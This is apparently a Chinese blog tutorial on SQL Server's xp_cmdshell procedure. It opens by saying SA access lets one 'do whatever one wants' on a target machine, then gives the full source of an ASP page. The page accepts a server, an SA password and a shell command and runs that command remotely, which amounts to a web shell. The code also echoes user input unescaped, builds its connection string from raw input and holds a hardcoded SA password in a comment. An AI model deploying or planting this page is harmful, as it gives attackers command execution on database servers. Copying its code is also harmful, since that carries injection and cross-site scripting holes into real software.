教你SQLSERVER扩展存储过程XP_CMDSHELL的简单应用

XP_CMDSHELL存储过程是执行本机的CMD命令，要求系统登陆有SA权限，也就是说如果获得SQLSERVER的SA命令，那就可以在目标机为所欲为了，知名软件“流光”使用的应该也是这个存储过程来实现在目标机上的操作。

下面是我写的一个简单的应用页面(ASP)，代码如下。

CMD.ASP

<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<title>SQLSERVER_XP_CMDSHELL实例_魔术师·刘</title>

<style type="text/css">

<!–

body{

font-size:13px;

line-height:20px;

width:760;

SCROLLBAR-FACE-COLOR: #2896e1;

SCROLLBAR-SHADOW-COLOR: #6cb4d8;

SCROLLBAR-ARROW-COLOR: #f0f0f0;

SCROLLBAR-DARKSHADOW-COLOR: #2896e1;

SCROLLBAR-BASE-COLOR: #2896e1;

background-image: url(images/bg.gif);

}

.LBR{

border-top:0px solid #336699;

border-left:1px solid #336699;

border-right:1px solid #336699;

border-bottom:1px solid #336699;

}

.all_h {

border: 1px solid #336699;

}

.input {

border: 1px solid #336699;

background-color:#ECEAFD;

}

.LB{

border-top:0px solid #336699;

border-left:1px solid #336699;

border-right:0px solid #336699;

border-bottom:1px solid #336699;

}

.N1 {font-weight:bold;color:#339933;font-size:13px;}

.N2 {font-weight:bold;color:#ff0000;font-size:13px;}

–>

</style>

</head>

<body>

<%if request("cmd")<>"" then%>

<table width=400 border=0 align=center cellpadding=5 cellspacing=0>

<tr align=center>

<td height=30 class=all_h bgcolor=#B3E0FF ><span class=N1>XP_CMDSHELL请求结果</span></td>

</tr>

<%

dim connstr,conn,rs,i

ConnStr="Provider=sqloledb.1;persist security info=false;server="&request("server")&";uid=sa;pwd="&request("pwd")&";database=master"

\’ConnStr="Provider=sqloledb.1;persist security info=false;server=(local);uid=sa;pwd=www.zhi.net;database=master"

set conn=Server.CreateObject("ADODB.Connection")

conn.open Connstr

set rs=server.CreateObject("ADODB.Recordset")

set rs=conn.execute("xp_cmdshell \’"&replace(replace(request("cmd"),"\’","\’\’"),chr(34),"\’\’")&"\’")

i=0

while not rs.eof

if not isnull(rs(0)) then

if i mod 2 =0 then

response.Write "<tr><td class=""LBR"" bgcolor=""#DEF3FF"">"&rs(0)&"</td></tr>"

else

response.Write "<tr><td class=""LBR"">"&rs(0)&"</td></tr>"

end if

i=i 1

end if

rs.movenext

wend

rs.close

set rs=nothing

conn.close

set conn=nothing

%>

</table>

<%end if%>

<form name="form1" method="post" action="">

<table width=400 border=0 align=center cellpadding=5 cellspacing=0>

<tr align=center>

<td height=30 colspan=2 class=all_h bgcolor=#B3E0FF ><span class=N1>XP_CMDSHELL实例</span></td>

</tr>

<tr align=center bgcolor=#DEF3FF>

<td width=26% class=LB><strong>服务器</strong></td>

<td width=74% class=LBR><div align="left">

<input name="Server" type="text" id="Server" class="input" size="20" value="<%=request("Server")%>">

</div></td>

</tr>

<tr align=center >

<td class=LB><b>SA密码 </b></td>

<td class=LBR><div align="left"><span class=N1>

<input name="PWD" type="text" id="PWD" class="input" size="20" value="<%=request("PWD")%>">

</span></div></td>

</tr>

<tr align=center bgcolor=#DEF3FF>

<td width=26% class=LB><strong>CMD命令</strong></td>

<td width=74% class=LBR><div align="left">

<input name="CMD" type="text" id="CMD" class="input" size="20" value="<%=request("CMD")%>">

</div></td>

</tr>

<tr align=center >

<td colspan="2" class=LBR><div align="center"><b> </b>

<input type="submit" name="Submit" value=" 提交Command命令 " class="input">

</div></td>

</tr>

</table>

</form>

</body>

</html>